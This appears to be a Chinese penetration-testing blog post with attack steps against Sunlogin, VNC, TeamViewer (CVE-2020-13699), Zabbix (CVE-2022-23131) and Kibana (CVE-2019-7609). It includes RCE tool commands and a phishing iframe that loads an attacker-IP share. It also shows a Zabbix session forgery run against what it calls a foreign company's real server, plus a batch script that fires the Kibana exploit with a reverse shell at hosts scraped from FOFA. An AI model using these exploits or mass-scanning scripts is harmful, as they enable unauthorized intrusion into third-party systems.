🍬 博主介绍👨🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
目录
大纲
知识点:
一、远程控制-向日葵&Vnc&Teamviewe
二、设备平台-Zabbix-CVE-2022-23131
0x1 前言
0x2 漏洞影响
0x3 漏洞复现
三、CVE-2019-7609:Kibana远程代码执行漏洞复现
0x1简介
0x2 漏洞概述
0x3 影响版本
0x4 漏洞复现:
大纲
知识点:
1、远程控制-第三方应用安全
2、三方应用-向日葵&VNC&TV
3、设备平台-Zabbix&Kibana漏洞
#章节内容:
常见服务应用的安全测试:
1、配置不当-未授权访问
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击#前置知识:
应用服务安全测试流程:见图
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属-数据库&文件传输&通讯等
3、判断服务利用方式-特定漏洞&未授权&弱口令等
一、远程控制-向日葵&Vnc&Teamviewe
1、下面这个是存在远程命令执行漏洞的向日葵:
GitHub - Mr-xn/sunlogin_rce: 向日葵 RCE
2、这个是远程命令执行的工具:
GitHub - Fheidt12/XRK-RCE: 向日葵远程命令执行漏洞
xrkRce.exe -h 192.168.233.140 -t scan
xrkRce.exe -h 192.168.233.140 -t rce -p 49516 -c "ipconfig"
Vnc
在使用的过程中有两个问题:
在security中有设置选项,这个就是设置安全的。
如果设置为none,则就不需要密码就可以直接连接这个主机安全中有几种模式:Windows password,VNC password,None
用客户端去连接这台主机,并不用输入账号密码,就可以直接连接也可在fofa中搜:app="VNC"&port="5900"这个密码是可以参加的,在hydra中是支持这个vnc猜解的。没有账号。
Teamviewe
这个类似于网站钓鱼,需要管理员访问特定的地址(我们构造的)构造的html代码:
<!DOCTYPE html>
<html>
<head><title>cve-2020-13699</title>
</head>
<body><p>Welcome to xiaodi!</p><iframe style="height:1px;width:1px;" src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
</body>
</html>当管理员去访问:http://192.168.233.1:8081/web/test.html
这个时候就会自动运行这个软件。teamviewer10: --play \\attacker-IP\share\fake.tvs是执行命令,如果要执行什么就可以进行修改完成测试。
二、设备平台-Zabbix-CVE-2022-23131
0x1 前言
zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。
0x2 漏洞影响
5.4.8
5.0.18
4.0.36
默认端口:10051
漏洞复现参考文章:
Zabbix登录绕过漏洞复现(CVE-2022-23131)-阿里云开发者社区
0x3 漏洞复现
FOFA检索:app="ZABBIX-监控系统" && body="saml"
自动化脚本工具如下:
┌──(root💀kali)-[~/桌面/cve-2022-23131-main]
└─# python3 cve-2022-23131.py http://20.16.77.158 Admin decode_payload: {"saml_data": {"username_attribute": "Admin"}, "sessionid": "9dba05c99b9dd5cd2c6b6915f8732f63", "sign": "58b5d6ee7d6597f1b275026c1b5b089ddde803403f93a053db0bcf372342a8a7"}
zbx_signed_session: eyJzYW1sX2RhdGEiOiB7InVzZXJuYW1lX2F0dHJpYnV0ZSI6ICJBZG1pbiJ9LCAic2Vzc2lvbmlkIjogIjlkYmEwNWM5OWI5ZGQ1Y2QyYzZiNjkxNWY4NzMyZjYzIiwgInNpZ24iOiAiNThiNWQ2ZWU3ZDY1OTdmMWIyNzUwMjZjMWI1YjA4OWRkZGU4MDM0MDNmOTNhMDUzZGIwYmNmMzcyMzQyYThhNyJ9
GitHub - L0ading-x/cve-2022-23131: cve-2022-23131
修改cookie值,然后点击SAML,就可以进入这个监控系统了
https://scan.ibt.uk.com/zabbix.php?action=dashboard.list
三、CVE-2019-7609:Kibana远程代码执行漏洞复现
0x1简介
Kibana 是为 Elasticsearch设计的开源分析和可视化平台。你可以使用 Kibana 来搜索,查看存储在 Elasticsearch 索引中的数据并与之交互。你可以很容易实现高级的数据分析和可视化,以图标的形式展现出来。
默认端口:5601
0x2 漏洞概述
攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。
0x3 影响版本
Kibana < 6.6.1
Kibana < 5.6.15
0x4 漏洞复现:
CVE-2019-7609:Kibana远程代码执行漏洞复现-腾讯云开发者社区-腾讯云
漏洞自动化脚本工具:
GitHub - LandGrey/CVE-2019-7609: exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts
FOFA检索语句:port="5601" && country="CN"
然后使用我们前一天讲的那个批量导出FOFA信息的工具,导出来然后保存为ips.txt,放在工具目录下
下面是可以进行批量扫描漏洞的python脚本,把这个脚本放在开始下载的那个CVE-2019-7609脚本工具文件夹下
import os
for ip in open('ips.txt'):ip=ip.strip()cmdline='python2 CVE-2019-7609-kibana-rce.py -u %s -host 10.10.10.128 -port 5566 --shell'%ipprint(cmdline)os.system(cmdline)#print(ip)
然后执行命令,进行监听,这里没有做授权,所以就不给师傅们演示了。